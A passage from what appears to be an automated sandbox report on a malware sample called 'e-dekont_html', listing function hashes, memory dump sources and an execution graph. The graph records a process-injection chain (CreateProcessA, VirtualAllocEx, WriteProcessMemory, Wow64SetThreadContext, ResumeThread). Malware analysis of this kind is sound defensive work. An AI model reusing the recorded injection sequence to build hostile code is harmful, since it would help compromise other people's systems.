                                                                                                                                                          • Instruction Fuzzy Hash: 52F096357406104B8B156A3E9C54B2AB6EEEFC8A5535540F9E90BC7365EF61CC06C790
                                                                                                                                                          Function 02BEE8E8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b03341e6584f2da5b5dd55151100965ab4f62ca98a199e9a26b2d76d49cb3a48
                                                                                                                                                          • Instruction ID: 815ff4cc9eb5fdb97ebd2bac54ff48b4baa839915857f578bb91b32169ebde73
                                                                                                                                                          • Opcode Fuzzy Hash: b03341e6584f2da5b5dd55151100965ab4f62ca98a199e9a26b2d76d49cb3a48
                                                                                                                                                          • Instruction Fuzzy Hash: 3C112979D0430AEFCB01DFA8E8449AEBBB1FB4A300F018466D910A3359E7305A15DF91
                                                                                                                                                          Function 02BE28AA Relevance: .0, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8c911a0da62b9682e7823b25350d947a1c4702c84813118e7975d9063865413e
                                                                                                                                                          • Instruction ID: 8b6e8cb8e169f7a7857314afc6b3decc8c0b6badf509a17d01659625d0c8eec2
                                                                                                                                                          • Opcode Fuzzy Hash: 8c911a0da62b9682e7823b25350d947a1c4702c84813118e7975d9063865413e
                                                                                                                                                          • Instruction Fuzzy Hash: BBE0C232D2022B97CB00EBA9EC008DEF738EE86220B808622D91033014EB302658C7E0
                                                                                                                                                          Function 02BE28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
                                                                                                                                                          • Instruction ID: eef81e55a18710681684a9a98b29a2baeac054be9c35fad894fcd2d0b64e3e16
                                                                                                                                                          • Opcode Fuzzy Hash: 7926a8ba6362f8b99166dce7ab25177a73bf1062ade499f860d157b83bc13450
                                                                                                                                                          • Instruction Fuzzy Hash: 76D05B35D2022B97CB01E7A5EC044DFF738EED6261B544626D91437154FB702659C6F1
                                                                                                                                                          Function 02BE6739 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3dbd29bbd9e82f5fe87c6e666f3e5cb63cf0f58191a6f85acab49538ad723237
                                                                                                                                                          • Instruction ID: f421b7838c66fbbdbe94d7d1b491c160e6cf36444b7b141823a96ebb10b46975
                                                                                                                                                          • Opcode Fuzzy Hash: 3dbd29bbd9e82f5fe87c6e666f3e5cb63cf0f58191a6f85acab49538ad723237
                                                                                                                                                          • Instruction Fuzzy Hash: 6FE05BB24083C10DC707E774BD794593F36EB41110B055E96D0444F65ADEB459469351
                                                                                                                                                          Function 02BED6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3cac9d1062971cf4188e54db3074dd7a4eef5de8ab5fbc7e29b77079aaa59c4f
                                                                                                                                                          • Instruction ID: b67c60e630ee3b5b4476a1d998378407a7bfa4c2ce7d31be28a83cb0bdd0ada4
                                                                                                                                                          • Opcode Fuzzy Hash: 3cac9d1062971cf4188e54db3074dd7a4eef5de8ab5fbc7e29b77079aaa59c4f
                                                                                                                                                          • Instruction Fuzzy Hash: 1CD04275E44109CFCF20DFA8E4845DCBB71EB89321B10556AD926A3251D6305465CF11
                                                                                                                                                          Function 02BEAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ccd5026405188548c573d9170cb8b72ffd78fa4acef3be31d4652386ec740c9a
                                                                                                                                                          • Instruction ID: 90b957d70a0010ddc58906f5efae448e8e2b952ab4e8c814fcd32735917cf21a
                                                                                                                                                          • Opcode Fuzzy Hash: ccd5026405188548c573d9170cb8b72ffd78fa4acef3be31d4652386ec740c9a
                                                                                                                                                          • Instruction Fuzzy Hash: E6D0673AB400189FCB049F98E8809DDF776FB98321B048516EA15A3265C6319925DB60
                                                                                                                                                          Function 02BE6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 67a204df37cade02be541bfb67e6c2bc70678b242799c734e6fcb9dafacb1e72
                                                                                                                                                          • Instruction ID: 575728434ea9c8d0aa7d442edf0d07970ba4e2755f0ad3cdc07609f4d58f1a7c
                                                                                                                                                          • Opcode Fuzzy Hash: 67a204df37cade02be541bfb67e6c2bc70678b242799c734e6fcb9dafacb1e72
                                                                                                                                                          • Instruction Fuzzy Hash: 7DC080314443094BC745F775FC95955376EFBC03147409F15B0050774DDE745C895791

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 02BE2A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$Xjq$Xjq$Xjq
                                                                                                                                                          • API String ID: 0-2725347807
                                                                                                                                                          • Opcode ID: d26dc2da6a37ebcfac6ecdbf85e99e02b1fd8ebea230e595ebc5ed8c50c8bf7e
                                                                                                                                                          • Instruction ID: a9e3f2b733eacbd8c113b4a26e5f3be0c84f187768dd7b791683a64dbc5a7a5d
                                                                                                                                                          • Opcode Fuzzy Hash: d26dc2da6a37ebcfac6ecdbf85e99e02b1fd8ebea230e595ebc5ed8c50c8bf7e
                                                                                                                                                          • Instruction Fuzzy Hash: 54317275E042198BDF649F79C98037FB6BAEB48310F1444E9C816A7380DB708985CB92
                                                                                                                                                          Function 02BE6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \;fq$\;fq$\;fq$\;fq
                                                                                                                                                          • API String ID: 0-4080798596
                                                                                                                                                          • Opcode ID: fbe4cd1026ee670c5cda6a2f0c84e98ad0cc9b71e312709d7ce80c6f76bb8ef0
                                                                                                                                                          • Instruction ID: bea686306c685cfb572672039d61d708046b5400d63b6c3b4f194f3d40eb48e9
                                                                                                                                                          • Opcode Fuzzy Hash: fbe4cd1026ee670c5cda6a2f0c84e98ad0cc9b71e312709d7ce80c6f76bb8ef0
                                                                                                                                                          • Instruction Fuzzy Hash: CD012139B101158FCF288E2DC584A2A77EEEFBC76471541A9E60ACB3A4DB31DC41C751

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:258
                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                          execution_graph 28427 7251ae0 28429 72517ec 28427->28429 28428 7251a3c 28429->28428 28434 72534a0 28429->28434 28451 7253471 28429->28451 28468 7253516 28429->28468 28486 72534b0 28429->28486 28435 72534ca 28434->28435 28447 72534d2 28435->28447 28503 72538dc 28435->28503 28508 7253cd2 28435->28508 28512 7254073 28435->28512 28517 7253ad0 28435->28517 28521 7253b77 28435->28521 28529 7253e54 28435->28529 28534 7253fed 28435->28534 28539 72538c3 28435->28539 28544 7253c40 28435->28544 28549 7253da0 28435->28549 28554 7253ec1 28435->28554 28559 7254226 28435->28559 28563 7253a9a 28435->28563 28569 725399e 28435->28569 28447->28428 28452 7253474 28451->28452 28453 7253479 28451->28453 28452->28453 28454 7254226 2 API calls 28452->28454 28455 7253ec1 2 API calls 28452->28455 28456 7253da0 2 API calls 28452->28456 28457 7253c40 2 API calls 28452->28457 28458 72538c3 2 API calls 28452->28458 28459 7253fed 2 API calls 28452->28459 28460 7253e54 2 API calls 28452->28460 28461 7253b77 4 API calls 28452->28461 28462 7253ad0 2 API calls 28452->28462 28463 7254073 2 API calls 28452->28463 28464 7253cd2 2 API calls 28452->28464 28465 72538dc 2 API calls 28452->28465 28466 725399e 2 API calls 28452->28466 28467 7253a9a 2 API calls 28452->28467 28453->28428 28454->28453 28455->28453 28456->28453 28457->28453 28458->28453 28459->28453 28460->28453 28461->28453 28462->28453 28463->28453 28464->28453 28465->28453 28466->28453 28467->28453 28469 72534a4 28468->28469 28470 7253519 28468->28470 28471 7254226 2 API calls 28469->28471 28472 7253ec1 2 API calls 28469->28472 28473 7253da0 2 API calls 28469->28473 28474 7253c40 2 API calls 28469->28474 28475 72538c3 2 API calls 28469->28475 28476 7253fed 2 API calls 28469->28476 28477 7253e54 2 API calls 28469->28477 28478 7253b77 4 API calls 28469->28478 28479 7253ad0 2 API calls 28469->28479 28480 7254073 2 API calls 28469->28480 28481 7253cd2 2 API calls 28469->28481 28482 72534d2 28469->28482 28483 72538dc 2 API calls 28469->28483 28484 725399e 2 API calls 28469->28484 28485 7253a9a 2 API calls 28469->28485 28470->28428 28471->28482 28472->28482 28473->28482 28474->28482 28475->28482 28476->28482 28477->28482 28478->28482 28479->28482 28480->28482 28481->28482 28482->28428 28483->28482 28484->28482 28485->28482 28487 72534ca 28486->28487 28488 7254226 2 API calls 28487->28488 28489 7253ec1 2 API calls 28487->28489 28490 7253da0 2 API calls 28487->28490 28491 7253c40 2 API calls 28487->28491 28492 72538c3 2 API calls 28487->28492 28493 7253fed 2 API calls 28487->28493 28494 7253e54 2 API calls 28487->28494 28495 7253b77 4 API calls 28487->28495 28496 7253ad0 2 API calls 28487->28496 28497 7254073 2 API calls 28487->28497 28498 7253cd2 2 API calls 28487->28498 28499 72534d2 28487->28499 28500 72538dc 2 API calls 28487->28500 28501 725399e 2 API calls 28487->28501 28502 7253a9a 2 API calls 28487->28502 28488->28499 28489->28499 28490->28499 28491->28499 28492->28499 28493->28499 28494->28499 28495->28499 28496->28499 28497->28499 28498->28499 28499->28428 28500->28499 28501->28499 28502->28499 28504 72538eb 28503->28504 28505 72539d5 28504->28505 28574 72513c4 28504->28574 28578 72513d0 28504->28578 28505->28447 28509 7253a2e 28508->28509 28582 7251230 28508->28582 28586 7251238 28508->28586 28509->28447 28590 72546a8 28512->28590 28595 72546b8 28512->28595 28513 7253fee 28513->28512 28514 72540e8 28513->28514 28608 7251141 28517->28608 28612 7251148 28517->28612 28518 7253ac4 28518->28447 28522 7253c0a 28521->28522 28616 7251088 28522->28616 28620 7251081 28522->28620 28523 7253c28 28525 7251141 WriteProcessMemory 28523->28525 28526 7251148 WriteProcessMemory 28523->28526 28524 72542a8 28524->28447 28525->28524 28526->28524 28530 7253e60 28529->28530 28532 7251141 WriteProcessMemory 28530->28532 28533 7251148 WriteProcessMemory 28530->28533 28531 72542eb 28532->28531 28533->28531 28535 725405e 28534->28535 28537 7251141 WriteProcessMemory 28535->28537 28538 7251148 WriteProcessMemory 28535->28538 28536 72542a8 28536->28447 28537->28536 28538->28536 28540 7253915 28539->28540 28541 72539d5 28540->28541 28542 72513c4 CreateProcessA 28540->28542 28543 72513d0 CreateProcessA 28540->28543 28541->28447 28542->28541 28543->28541 28545 7253cd6 28544->28545 28547 7251230 ReadProcessMemory 28545->28547 28548 7251238 ReadProcessMemory 28545->28548 28546 7253a2e 28546->28447 28547->28546 28548->28546 28550 7253dad 28549->28550 28624 7250690 28550->28624 28628 7250689 28550->28628 28551 7253a2e 28551->28447 28555 7253ec7 28554->28555 28557 7250690 ResumeThread 28555->28557 28558 7250689 ResumeThread 28555->28558 28556 7253a2e 28556->28447 28557->28556 28558->28556 28561 7250b70 Wow64SetThreadContext 28559->28561 28562 7250b78 Wow64SetThreadContext 28559->28562 28560 725424e 28561->28560 28562->28560 28564 7253aa7 28563->28564 28565 7254233 28563->28565 28566 725424e 28565->28566 28567 7250b70 Wow64SetThreadContext 28565->28567 28568 7250b78 Wow64SetThreadContext 28565->28568 28567->28566 28568->28566 28570 72539a4 28569->28570 28572 72513c4 CreateProcessA 28570->28572 28573 72513d0 CreateProcessA 28570->28573 28571 72539d5 28571->28447 28572->28571 28573->28571 28575 72513cc CreateProcessA 28574->28575 28577 725161b 28575->28577 28579 72513d1 CreateProcessA 28578->28579 28581 725161b 28579->28581 28583 7251283 ReadProcessMemory 28582->28583 28585 72512c7 28583->28585 28585->28509 28587 7251283 ReadProcessMemory 28586->28587 28589 72512c7 28587->28589 28589->28509 28591 72546ac 28590->28591 28600 7250b70 28591->28600 28604 7250b78 28591->28604 28592 72546e3 28592->28513 28596 72546b9 28595->28596 28598 7250b70 Wow64SetThreadContext 28596->28598 28599 7250b78 Wow64SetThreadContext 28596->28599 28597 72546e3 28597->28513 28598->28597 28599->28597 28601 7250bbd Wow64SetThreadContext 28600->28601 28603 7250c05 28601->28603 28603->28592 28605 7250bbd Wow64SetThreadContext 28604->28605 28607 7250c05 28605->28607 28607->28592 28609 7251148 WriteProcessMemory 28608->28609 28611 72511e7 28609->28611 28611->28518 28613 7251190 WriteProcessMemory 28612->28613 28615 72511e7 28613->28615 28615->28518 28617 72510c8 VirtualAllocEx 28616->28617 28619 7251105 28617->28619 28619->28523 28621 72510c8 VirtualAllocEx 28620->28621 28623 7251105 28621->28623 28623->28523 28625 7250691 ResumeThread 28624->28625 28627 7250701 28625->28627 28627->28551 28629 725068c ResumeThread 28628->28629 28631 7250701 28629->28631 28631->28551 28742 2b6d650 DuplicateHandle 28743 2b6d6e6 28742->28743 28744 2b6d000 28745 2b6d046 GetCurrentProcess 28744->28745 28747 2b6d091 28745->28747 28748 2b6d098 GetCurrentThread 28745->28748 28747->28748 28749 2b6d0d5 GetCurrentProcess 28748->28749 28750 2b6d0ce 28748->28750 28751 2b6d10b 28749->28751 28750->28749 28752 2b6d133 GetCurrentThreadId 28751->28752 28753 2b6d164 28752->28753 28632 72547a8 28634 72547a9 28632->28634 28633 7254933 28634->28633 28637 7254a20 28634->28637 28641 7254a28 28634->28641 28638 7254a24 28637->28638 28639 7254a29 PostMessageW 28637->28639 28638->28639 28640 7254a94 28639->28640 28640->28634 28642 7254a29 PostMessageW 28641->28642 28643 7254a94 28642->28643 28643->28634 28644 2b64668 28645 2b6467a 28644->28645 28646 2b64686 28645->28646 28650 2b64779 28645->28650 28655 2b63e34 28646->28655 28648 2b646a5 28651 2b6479d 28650->28651 28659 2b64888 28651->28659 28663 2b64879 28651->28663 28656 2b63e3f 28655->28656 28671 2b65c44 28656->28671 28658 2b67018 28658->28648 28660 2b648af 28659->28660 28662 2b6498c 28660->28662 28667 2b644b4 28660->28667 28664 2b64888 28663->28664 28665 2b644b4 CreateActCtxA 28664->28665 28666 2b6498c 28664->28666 28665->28666 28668 2b65918 CreateActCtxA 28667->28668 28670 2b659cf 28668->28670 28672 2b65c4f 28671->28672 28675 2b65c64 28672->28675 28674 2b670bd 28674->28658 28676 2b65c6f 28675->28676 28679 2b65c94 28676->28679 28678 2b6719a 28678->28674 28680 2b65c9f 28679->28680 28683 2b65cc4 28680->28683 28682 2b6728d 28682->28678 28684 2b65ccf 28683->28684 28686 2b6858b 28684->28686 28689 2b6ac3a 28684->28689 28685 2b685c9 28685->28682 28686->28685 28693 2b6cd29 28686->28693 28703 2b6ac70 28689->28703 28707 2b6ac5f 28689->28707 28690 2b6ac4e 28690->28686 28696 2b6cd59 28693->28696 28694 2b6cd7d 28694->28685 28695 2b6ce1d 28697 2b6cf2f 28695->28697 28734 2b6baa0 28695->28734 28696->28694 28696->28695 28702 2b6cd29 2 API calls 28696->28702 28722 2b6ce56 28696->28722 28726 2b6cee8 28696->28726 28730 2b6cea5 28696->28730 28697->28685 28702->28695 28712 2b6ad68 28703->28712 28717 2b6ad58 28703->28717 28704 2b6ac7f 28704->28690 28708 2b6ac70 28707->28708 28710 2b6ad68 GetModuleHandleW 28708->28710 28711 2b6ad58 GetModuleHandleW 28708->28711 28709 2b6ac7f 28709->28690 28710->28709 28711->28709 28713 2b6ad9c 28712->28713 28714 2b6ad79 28712->28714 28713->28704 28714->28713 28715 2b6afa0 GetModuleHandleW 28714->28715 28716 2b6afcd 28715->28716 28716->28704 28718 2b6ad9c 28717->28718 28719 2b6ad79 28717->28719 28718->28704 28719->28718 28720 2b6afa0 GetModuleHandleW 28719->28720 28721 2b6afcd 28720->28721 28721->28704 28724 2b6ce48 28722->28724 28723 2b6cf2f 28723->28695 28724->28723 28725 2b6baa0 2 API calls 28724->28725 28725->28723 28728 2b6cef5 28726->28728 28727 2b6cf2f 28727->28695 28728->28727 28729 2b6baa0 2 API calls 28728->28729 28729->28727 28732 2b6ce48 28730->28732 28731 2b6cf2f 28731->28695 28732->28730 28732->28731 28733 2b6baa0 2 API calls 28732->28733 28733->28731 28735 2b6baab 28734->28735 28737 2b6dc48 28735->28737 28738 2b6d29c 28735->28738 28737->28737 28739 2b6d2a7 28738->28739 28740 2b65cc4 2 API calls 28739->28740 28741 2b6dcb7 28740->28741 28741->28737

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 072334B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 496 72334b8-72334e0 497 72334e2 496->497 498 72334e7-72335a3 496->498 497->498 501 72335a5-72335a6 498->501 502 72335a8-72335b5 498->502 503 72335c7-72335cb 501->503 502->501 502->503 504 72335d1-72335fb 503->504 505 7233abb-7233afd 503->505 508 7233601-7233619 504->508 509 7233cc8-7233cd4 504->509 514 7233b00-7233b04 505->514 510 7233cda-7233ce3 508->510 511 723361f-7233620 508->511 509->510 515 7233ce9-7233cf5 510->515 513 7233cae-7233cba 511->513 518 7233cc0-7233cc7 513->518 519 7233625-7233631 513->519 516 72336d6-72336da 514->516 517 7233b0a-7233b10 514->517 528 7233cfb-7233d07 515->528 520 72336ec-72336f2 516->520 521 72336dc-72336ea 516->521 517->505 524 7233b12-7233b6d 517->524 522 7233633 519->522 523 7233638-7233653 519->523 526 7233737-723373b 520->526 525 723374a-723377c 521->525 522->523 523->515 527 7233659-723367e 523->527 546 7233ba4-7233bce 524->546 547 7233b6f-7233ba2 524->547 548 72337a6 525->548 549 723377e-723378a 525->549 529 72336f4-7233700 526->529 530 723373d 526->530 527->528 540 7233684-7233686 527->540 535 7233d0d-7233d14 528->535 532 7233702 529->532 533 7233707-723370f 529->533 536 7233740-7233744 530->536 532->533 538 7233711-7233725 533->538 539 7233734 533->539 536->525 541 72336bc-72336d3 536->541 544 723372b-7233732 538->544 545 7233689-7233694 538->545 539->526 540->545 541->516 544->530 545->535 550 723369a-72336b7 545->550 557 7233bd7-7233c56 546->557 547->557 556 72337ac-72337d9 548->556 553 7233794-723379a 549->553 554 723378c-7233792 549->554 550->536 558 72337a4 553->558 554->558 563 72337db-7233813 556->563 564 7233828-72338bb 556->564 572 7233c5d-7233c70 557->572 558->556 571 7233c7f-7233c84 563->571 579 72338c4-72338c5 564->579 580 72338bd 564->580 574 7233c86-7233c94 571->574 575 7233c9b-7233cab 571->575 572->571 574->575 575->513 581 7233916-723391c 579->581 580->579 582 72338c7-72338e6 581->582 583 723391e-72339e0 581->583 584 72338e8 582->584 585 72338ed-7233913 582->585 594 72339e2-7233a1b 583->594 595 7233a21-7233a25 583->595 584->585 585->581 594->595 596 7233a27-7233a60 595->596 597 7233a66-7233a6a 595->597 596->597 599 7233aab-7233aaf 597->599 600 7233a6c-7233aa5 597->600 599->524 601 7233ab1-7233ab9 599->601 600->599 601->514
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq$:$pjq$~
                                                                                                                                                          • API String ID: 0-2740937384
                                                                                                                                                          • Opcode ID: 2911af16740678f44173135ad9b31d93780403d2b1f264af521a437048d71033
                                                                                                                                                          • Instruction ID: 6bc0d8eb7ff258f841a80e786f774aebc9f775080c5d8c8725545375a407da01
                                                                                                                                                          • Opcode Fuzzy Hash: 2911af16740678f44173135ad9b31d93780403d2b1f264af521a437048d71033
                                                                                                                                                          • Instruction Fuzzy Hash: 7542F2B5A10219DFDB15CFA9C984B99BBB2FF49300F1580E9E509AB262D731DE91DF00
                                                                                                                                                          Function 07232106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 627 7232106-723210a 628 723210b-7232120 627->628 629 7232acd-7232adf 627->629 628->629 630 7232121-723212c 628->630 632 7232132-723213e 630->632 633 723214a-7232159 632->633 635 72321b8-72321bc 633->635 636 72321c2-72321cb 635->636 637 7232264-72322ce 635->637 638 72321d1-72321e7 636->638 639 72320c6-72320d2 636->639 637->629 675 72322d4-723281b 637->675 645 7232239-723224b 638->645 646 72321e9-72321ec 638->646 639->629 641 72320d8-72320e4 639->641 642 72320e6-72320fa 641->642 643 723215b-7232161 641->643 642->643 653 72320fc-7232105 642->653 643->629 647 7232167-723217f 643->647 657 7232251-7232261 645->657 658 7232a0c-7232ac2 645->658 646->629 649 72321f2-723222f 646->649 647->629 656 7232185-72321ad 647->656 649->637 671 7232231-7232237 649->671 653->627 656->635 658->629 671->645 671->646 753 7232832-72328c5 675->753 754 723281d-7232827 675->754 755 72328d0-7232963 753->755 754->755 756 723282d 754->756 757 723296e-7232a01 755->757 756->757 757->658
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: D
                                                                                                                                                          • API String ID: 0-2746444292
                                                                                                                                                          • Opcode ID: 43921c6832507f1b103230e5686f22b2c1443351406b5063808becac9ae75e22
                                                                                                                                                          • Instruction ID: f7060b40274c2688ff6800cfe802925ceb50beb949600224531de3288b07c2c1
                                                                                                                                                          • Opcode Fuzzy Hash: 43921c6832507f1b103230e5686f22b2c1443351406b5063808becac9ae75e22
                                                                                                                                                          • Instruction Fuzzy Hash: C152A878A102298FCB64DF68D998BD9BBB2BF89310F1041D9D509A7365CB34AE81CF50
                                                                                                                                                          Function 07232C38 Relevance: 7.9, Strings: 6, Instructions: 430COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 294 7232c38-7232c4a 295 7232c53-7232c5f 294->295 296 7232c4c-7232c4e 294->296 299 7232c61-7232c63 295->299 300 7232c68-7232c7d 295->300 297 7232d26-7232d2b 296->297 299->297 303 7232c91-7232c9d 300->303 304 7232c7f-7232c8a 300->304 307 7232caa-7232cac 303->307 308 7232c9f-7232ca8 303->308 304->303 309 7232cae-7232cba 307->309 310 7232cbc-7232cc0 307->310 308->307 309->310 315 7232cd2-7232cdc 309->315 311 7232cc2-7232ccc 310->311 312 7232cce-7232cd0 310->312 317 7232d38-7232d44 311->317 312->297 320 7232cde-7232cea 315->320 321 7232d2c-7232d36 315->321 322 7232d51-7232d53 317->322 323 7232d46-7232d4f 317->323 327 7232cfc-7232cfe 320->327 328 7232cec-7232cfa 320->328 321->317 322->297 323->297 327->297 328->327 330 7232d00-7232d06 328->330 331 7232d0a 330->331 332 7232d08 330->332 333 7232d0c-7232d0e 331->333 332->333 334 7232d10-7232d1c 333->334 335 7232d55-7232de1 333->335 334->335 338 7232d1e 334->338 348 7232de3-7232ded 335->348 349 7232def-7232e0b 335->349 338->297 348->349 352 7232e28-7232e3c 348->352 354 7232e23-7232e25 349->354 355 7232e0d-7232e21 349->355 360 7232e43-7232e79 352->360 355->354 355->360 364 7232e7f-7232e91 360->364 365 7232f4e-7232f51 360->365 367 7232e93-7232e96 364->367 368 7232ea6-7232ea9 364->368 369 7232f1b-7232f21 367->369 370 7232e9c-7232e9f 367->370 371 7232eab-7232eae 368->371 372 7232eb9-7232ebf 368->372 373 7232f23-7232f25 369->373 374 7232f27-7232f33 369->374 377 7232ea1 370->377 378 7232eea-7232ef0 370->378 379 7232eb4 371->379 380 7232f4a-7232f4c 371->380 375 7232ec1-7232ec3 372->375 376 7232ec5-7232ed1 372->376 381 7232f35-7232f48 373->381 374->381 382 7232ed3-7232ee8 375->382 376->382 377->380 383 7232ef2-7232ef4 378->383 384 7232ef6-7232f02 378->384 379->380 380->365 385 7232f52-7232fe5 380->385 381->380 382->380 388 7232f04-7232f19 383->388 384->388 401 7232fe7 385->401 402 7232fec-7233000 385->402 388->380 401->402 403 7233006-723300b 402->403 404 72330f4 402->404 405 7233011-7233016 403->405 406 72330c6 403->406 407 72330fa-72330fb 404->407 408 7233100 405->408 409 723301c-723301d 405->409 441 72330c9 call 72384fa 406->441 442 72330c9 call 7238508 406->442 407->403 445 7233100 call 72332c1 408->445 446 7233100 call 72332d0 408->446 447 7233020 call 7233d21 409->447 448 7233020 call 7233d30 409->448 449 7233020 call 7233d9e 409->449 410 72330cf-72330da 416 72330e3 410->416 417 72330dc-72330e0 410->417 411 7233106-7233107 411->409 412 7233026-7233033 414 7233039-723303d 412->414 415 723310c-7233113 412->415 418 7233043-723305b 414->418 419 7233118-723311f 414->419 415->414 443 72330e3 call 7254730 416->443 444 72330e3 call 7254740 416->444 420 72330e2 417->420 421 7233086-7233087 417->421 425 7233061-7233064 418->425 426 7233124-723312b 418->426 419->418 420->416 434 723308a call 7236c28 421->434 435 723308a call 